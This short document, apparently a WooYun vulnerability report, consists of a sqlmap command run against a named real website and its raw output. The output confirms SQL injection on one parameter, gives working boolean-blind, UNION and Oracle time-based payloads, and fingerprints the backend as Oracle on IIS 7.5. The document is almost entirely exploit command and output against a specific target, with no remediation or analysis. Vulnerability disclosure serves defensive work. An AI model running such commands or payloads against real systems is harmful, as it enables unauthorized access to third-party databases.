WooYun.org

python sqlmap.py -u 'http://www.lanzhourailwaybureau.com.cn/news_pic_dis.asp?x=522'
[*] starting at 16:01:16
[16:01:16] [INFO] resuming back-end DBMS 'oracle'
[16:01:19] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: x
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: x=522 AND 9378=9378
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: x=-2422 UNION ALL SELECT NULL,NULL,NULL,CHR(113)||CHR(114)||CHR(105)||CHR(98)||CHR(113)||CHR(77)||CHR(116)||CHR(109)||CHR(122)||CHR(76)||CHR(85)||CHR(73)||CHR(121)||CHR(86)||CHR(103)||CHR(113)||CHR(106)||CHR(117)||CHR(101)||CHR(113),NULL,NULL FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: x=522 AND 9902=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
---
[16:01:20] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Oracle